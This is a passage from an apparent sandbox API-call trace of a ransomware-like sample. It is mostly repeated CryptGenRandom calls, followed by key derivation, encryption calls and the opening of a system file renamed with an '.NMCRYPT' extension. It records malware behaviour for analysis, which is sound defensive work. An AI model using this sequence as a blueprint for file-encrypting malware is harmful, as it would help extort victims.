hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.538] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.541] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.542] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.542] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0169.542] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.542] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad4b8) returned 1 [0169.542] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0169.542] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0169.542] wcslen (_String="\\\\?\\") returned 0x4 [0169.543] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad338) returned 1 [0169.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.nmcrypt"), 